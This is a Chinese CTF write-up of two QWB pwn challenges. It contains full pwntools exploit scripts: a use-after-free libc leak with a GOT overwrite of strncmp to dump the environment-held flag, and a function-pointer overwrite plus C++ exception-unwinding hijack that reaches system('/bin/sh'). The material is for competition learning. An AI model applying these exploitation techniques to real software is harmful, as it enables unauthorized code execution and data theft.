本次强网杯初赛做出两道pwn题,把详细题解写一下记录。
<!--more-->
baby_heap
附件下载
2.35 的版本,IDA打开,堆菜单题,经典增删改查之外,还有两个额外的操作,一个是环境变量,另一个是任意地址写 0x10 字节。
del 里面有很明显的UAF漏洞。
show 只有一次机会,但是可以同时将 libc 和堆地址一起泄露出来,只需要我们释放两个相同大小的堆块之后,bk_nextsize 和 fd_nextsize 上面就会携带堆的地址,然而我自己的做法中没有用到。
交互函数:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 | from pwn import *
context.log_level = "debug"
p = process( "./pwn" )
libc = ELF( "/lib/x86_64-linux-gnu/libc.so.6" )
def choice(ch):
p.sendlineafter( "choice:" , str (ch))
def add(size):
choice( 1 )
p.sendlineafter( 'size' , str (size))
def free(idx):
choice( 2 )
p.sendlineafter( 'delete:' , str (idx))
def edit(idx, payload):
choice( 3 )
p.sendlineafter( 'edit:' , str (idx))
p.sendafter( 'content' ,content)
def show(idx):
choice( 4 )
p.sendlineafter( 'show:' , str (idx))
def env(ch):
choice( 5 )
p.sendlineafter( 'sad !' , str (ch))
def write(addr1,payload):
choice( 6 )
p.sendafter( 'addr' ,p64(addr1))
p.send(payload)
|
先add出四个堆块,把 1 3 free 掉,再打印出 3 堆块的内容,即可连带泄露 libc 和堆地址。
1 2 3 4 5 6 7 | add( 0x500 )
add( 0x500 )
add( 0x500 )
add( 0x500 )
free( 1 )
free( 3 )
show( 3 )
|
运行结果
注意到选项 6 并不是任意地址写,而是有一定限制的,
这里说实话不知道是不是 IDA 解析有问题。因为理论上来说 stdin 是 FILE *
类型,占 8 字节,因此 &stdin[512]
等同于 stdin 的地址加上 512*8=4096=0x1000
,但是将视角调到汇编时会发现
它往后加了 0x1b000 的地址,通常情况下,以汇编为准一定没问题(以上是做题时的想法),但是后来才发现犯了一个错误,stdin 的确是 FILE * 类型的,但是 stdin[0]
是 FILE 类型的,直接的 stdin 是一个指向 _IO_2_1_stdin_
的指针,类型为 FILE,在 gdb 里面也很容易观察到这一点。
这里主要观察这个 &stdin[512] 与 stdin 的差值,以及可以发现,它所禁用的这个范围就是 libc _IO_2_1_stdin_
之后的data 段,全部不允许写。
而另外一个条件就有意思了,不能超过 80 开头的一个地址,基本不会触发,所以目标很明确,让我们去写 libc _IO_2_1_stdin_
之前的 data 段,或者是写堆段,程序段写不了因为没有办法泄露地址。
先考虑前者,来看看之前的 data 段存了哪些内容。
发现基本是 got 表,于是尝试输出看看 libc 的 got 表,发现都是跟字符串操作的相关函数
看来可以尝试在这里找一个函数作为跳板,能不能 one_gadget
呢?显然不能,这题有沙箱。
除非你能找到一个 execveat 系统调用执行的 one_gadget
这题才能直接一键利用。
同时注意到选项 5 对环境变量的相关操作
这里可以直接上 glibc 的源码。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 | char *
getenv ( const char *name)
{
char **ep;
uint16_t name_start;
if (__environ == NULL || name[0] == '\0' )
return NULL;
if (name[1] == '\0' )
{
#if __BYTE_ORDER == __LITTLE_ENDIAN || !_STRING_ARCH_unaligned
name_start = ( '=' << 8) | *( const unsigned char *) name;
#else
name_start = '=' | ((*( const unsigned char *) name) << 8);
#endif
for (ep = __environ; *ep != NULL; ++ep)
{
#if _STRING_ARCH_unaligned
uint16_t ep_start = *(uint16_t *) *ep;
#else
uint16_t ep_start = (((unsigned char *) *ep)[0]
| (((unsigned char *) *ep)[1] << 8));
#endif
if (name_start == ep_start)
return &(*ep)[2];
}
}
else
{
size_t len = strlen (name);
#if _STRING_ARCH_unaligned
name_start = *( const uint16_t *) name;
#else
name_start = ((( const unsigned char *) name)[0]
| ((( const unsigned char *) name)[1] << 8));
#endif
len -= 2;
name += 2;
for (ep = __environ; *ep != NULL; ++ep)
{
#if _STRING_ARCH_unaligned
uint16_t ep_start = *(uint16_t *) *ep;
#else
uint16_t ep_start = (((unsigned char *) *ep)[0]
| (((unsigned char *) *ep)[1] << 8));
#endif
if (name_start == ep_start && ! strncmp (*ep + 2, name, len)
&& (*ep)[len + 2] == '=' )
return &(*ep)[len + 3];
}
}
return NULL;
}
|
观察到最后一个循环中,它在遍历环境变量,并且使用 strncmp 这个函数,而这个函数恰好是在 got 表中的,如果尝试将其改为 puts,结果会如何呢?
可以发现只输出了 USER 环境变量,而且前两位被去掉了,我们从头来分析这个源码看。因为我们入口是 getenv("USER")
,所以长度为 1 的判断就直接过掉,直接看 else 分支,似乎只有开头两个字符匹配到了,才会紧接着调用 strncmp,因此出现了只输出 USER 环境变量的问题。
但是当我选择选项 2 或 3 的时候,它输出了所有的环境变量
也就是说不管是调用 putenv 还是 setenv,在劫持了 strncmp 函数之后都可以完美输出所有环境变量。
它们两个函数内部都调用了一个函数 __add_to_environ
。
函数源码跳楼
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 | int
__add_to_environ ( const char *name, const char *value, const char *combined,
int replace)
{
char **ep;
size_t size;
const size_t namelen = strlen (name);
size_t vallen;
if (combined == NULL)
vallen = strlen (value) + 1;
LOCK;
ep = __environ;
size = 0;
if (ep != NULL)
{
for (; *ep != NULL; ++ep)
if (! strncmp (*ep, name, namelen) && (*ep)[namelen] == '=' )
break ;
else
++size;
}
return 0;
}
|
通过分析这个函数的源码,可以发现这里会无条件地去遍历环境变量一次一次调用 strncmp 去判断,并且很幸运,第一个参数就是函数变量的指针,因此修改 strncmp 的 got 为 puts 函数,就可以输出所有的环境变量。
在远程环境中, flag 就在环境变量中。
总EXP:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 | from pwn import *
context.log_level = "debug"
p = process( "./pwn" )
libc = ELF( "/lib/x86_64-linux-gnu/libc.so.6" )
def choice(ch):
p.sendlineafter( "choice:" , str (ch))
def add(size):
choice( 1 )
p.sendlineafter( 'size' , str (size))
def free(idx):
choice( 2 )
p.sendlineafter( 'delete:' , str (idx))
def edit(idx, payload):
choice( 3 )
p.sendlineafter( 'edit:' , str (idx))
p.sendafter( 'content' ,content)
def show(idx):
choice( 4 )
p.sendlineafter( 'show:' , str (idx))
def env(ch):
choice( 5 )
p.sendlineafter( 'sad !' , str (ch))
def write(addr1,payload):
choice( 6 )
p.sendafter( 'addr' ,p64(addr1))
p.send(payload)
add( 0x500 )
add( 0x500 )
add( 0x500 )
add( 0x500 )
free( 1 )
free( 3 )
show( 3 )
libc_addr = u64(p.recvuntil(b "\x7f" )[ - 6 :].ljust( 8 ,b "\x00" )) - 0x21ace0
success( 'libc_addr: ' + hex (libc_addr))
write(libc_addr + 0x21a118 ,p64(libc_addr + libc.sym[ 'puts' ]))
env( 2 )
gdb.attach(p)
p.interactive()
|
第二种方法当然是可以用 Largebin Attack 去打,但是过于复杂,可能自己还没学会,主要在于分享自己的 EXP 和做题思路了,就不增加额外的工作量。
expect_number
附件下载
这题没给 libc,应该题目自己有提权或者是给 flag 的东西,运行它输出的话,需要让我们最终计算得到 0x4F5DA2
这个值。
也是一个很经典的菜单
选项 1 发现它会根据随机 1~4
之间的整数来判断当前对数字做四则运算,1、2、3、4 分别对应了加、减、乘、除,并且另一个运算的数字只能是 0 1 2。既然是随机,那么交叉一下 srand 函数看看它是用了什么种子。
虽然调用了 time 函数,但是使用了 1 作为种子,因此序列是固定的,可以自己也编写一个 C 语言程序去输出这个序列。
1 2 3 4 5 6 7 8 9 | #include<unistd.h>
#include<stdio.h>
#include<stdlib.h>
int main(){
srand (1);
for ( int i=0;i<288;i++){
printf ( "%d " , rand ()%4+1);
}
}
|
为了避免被怀疑水长度,这里 288 个数字不展示了,仅在最后 EXP 展示。
很显然的,加减如果是 0,那么这次加减是无效的,乘除如果是 1,这次乘除也是无效的,来先看看指定数值的判断逻辑。
它只判断最后的那一个字节是否为 a8,自己构造序列也挺简单,遇到除法就给 1,遇到减法就给 0,结果发现再一次加法中突然报错了。
顺着报错找到代码
看了一下可能我的数值不超过 0x100,但是发现 >0x80 的数被识别为了负数,前面将char类型做了符号扩展之后又转为无符号整数,自然就超出范围了。
这里举个例子构造 0x82,再次尝试加法的时候结果为 0x80于是进入里面的逻辑
可以发现它先做了零扩展(movzx),再做了符号扩展(movsx),因此下一步 RAX 的值变为了 0xffffff80
,对于res来说,它是 -80 了,再+2变为 -78,转为无符号整数之后自然就超过了 0x100
因此如果想算出超过 0x80 的字节,必须算到对应的 /2 的形式,而且最后一个运算符必须是 *2
,结果只能是偶数,不能结果不能超过一个字节。
这些结论做稍加的数学推导应该很容易发现,但是当你好不容易凑好 0x54,再乘 2 得到 0xa8 的时候,会发现,远程 gift 是没有这个文件的。
咨询出题人(合理的咨询是不违反比赛规则的)后发现这是正常情况
那么题目就不是让我们执行这个 system("cat gift")
了,闲来无事去找字符串的时候发现 /bin/sh
,发现在输入选项的时候有一个后门。
发现 cin 被 try 包裹了,如果出现运行时错误,那么就执行 system("/bin/sh")
,而试过了各种输入都无法触发,一再陷入僵局,后面发现了退出函数有一个函数指针的调用。
正常情况下就是输出 Good Bye
,于是想到能否将结果覆盖到上面,计算的数值的结构体是
1 2 3 4 5 6 | struct calc{
char *unknown;
int rounds;
char num[288];
char s;
}
|
而我们的数值是随着 round 增加保存在后面的,查看是否有机会覆盖函数指针,结构体地址在 5400
,而函数指针在 5520
,显然我们足以覆盖这个函数指针。
具体字段图中标出,我们有机会覆盖任意字节到函数指针的低位。
于是找各种可能的情况,在 4c00 的地址 0x100 字节范围内看看有什么能修改的。
这里大概率都是虚函数表,发现 0x60 偏移处有一个栈溢出,栈溢出刚好足以让我们覆盖返回地址。
同时发现它主动检测溢出了会抛出运行时异常,运行时异常 emm,是不是可以和前面结合一下呢,答案是可以的,我们来了解一下C++如何处理异常的。我们都知道,在严格的异常处理流程,一个函数如果有可能抛出异常,要么你声明它本身也是可以抛出异常,要么将可能抛出异常的函数用 try 包裹。
C++ 如何实现多级的 try 判断呢,答案是栈回溯,它会寻找调用栈,判断之前的函数有没有被 try 包裹,有的话尝试捕获去处理。正常情况下这种设计当然没问题,如果返回值地址被我们修改的话,它就会根据返回值地址的值去寻找调用栈,那么此时我就可以尝试将这个抛出的异常在 cin 输入那里去捕获,然后完成 system("/bin/sh")
的调用。
并且 show 功能可以输出程序基地址,也不用去爆破了。
最后一点需要注意的是,看到后门这里,它有一条写栈内存的指令,因此在溢出的时候,RBP 要设为一个可写的地址。
最终 EXP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 | from pwn import *
p = process( './expect_number' ,aslr = False )
context.log_level = 'debug'
seq = "4 3 2 4 2 4 3 1 2 2 3 4 3 4 4 3 1 3 1 1 4 1 4 2 3 3 3 4 4 4 2 3 3 3 2 4 2 1 4 3 2 2 2 4 1 2 3 1 4 3 2 3 4 1 1 2 3 3 1 2 2 2 1 4 1 2 3 2 2 2 1 4 3 2 3 4 3 1 4 3 4 1 1 3 1 1 4 4 3 4 1 1 1 1 4 1 3 3 3 4 4 3 3 3 4 2 2 3 2 1 1 1 2 1 3 2 2 2 1 4 1 2 4 2 2 4 2 4 2 4 4 1 2 2 3 2 3 4 4 1 1 4 1 2 4 4 3 1 1 4 1 2 1 4 3 2 3 4 2 4 4 1 1 1 2 3 2 1 3 1 1 3 4 1 4 4 4 2 4 1 1 4 2 1 4 4 3 2 3 4 2 2 4 2 3 1 4 4 1 2 1 1 4 4 2 3 3 1 1 3 1 1 2 2 2 1 1 4 3 4 3 4 1 2 1 3 2 4 3 3 2 3 3 1 2 4 4 1 1 4 3 1 4 4 3 1 1 3 4 3 2 2 2 3 3 2 1 1 1 3 3 2 1 1 3 3 1 2 3 1 1 1 1 4 4 3 1 4 2 4 2 3 2 3 1 4 4 2" .split( ' ' )
seqnum = [ int (i) for i in seq]
target = 0x60
now = 0
ch = 0
k = ''
for i in seqnum:
p.sendlineafter( 'choice ' , '1' )
if i = = 1 :
k + = '2'
now + = 2
p.sendlineafter( 'or 0' , str ( 2 ))
elif i = = 2 :
k + = '0'
p.sendlineafter( 'or 0' , str ( 0 ))
else :
k + = '1'
p.sendlineafter( 'or 0' , str ( 1 ))
ch + = 1
if now = = target: break
gdb.attach(p)
for i in seqnum[ch: - 0xc ]:
p.sendlineafter( 'choice ' , '1' )
if i = = 1 or i = = 2 :
p.sendlineafter( 'or 0' , str ( 0 ))
k + = '0'
else :
p.sendlineafter( 'or 0' , str ( 1 ))
k + = '1'
p.sendlineafter( 'choice ' , '2' )
p.recvuntil(k)
addr = u64(p.recv( 6 ) + b '\0\0' ) - 0x4c60
success( 'code: ' + hex (addr))
payload = b '\x00' * 0x20 + p64(addr + 0x5080 ) + p64(addr + 0x251A )
p.sendlineafter( 'choice ' , '4' )
p.sendafter( 'Tell me your favorite number.' , payload)
p.interactive()
|
本地运行结果
远程运行结果(纪念一下hh)
总结
能打出两题还是挺开心的,感谢强网杯提供的高质量赛题(就是rs和go没学过后面就坐牢了),不管是从考点还是利用难度来说,题目出的都是非常棒的。
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)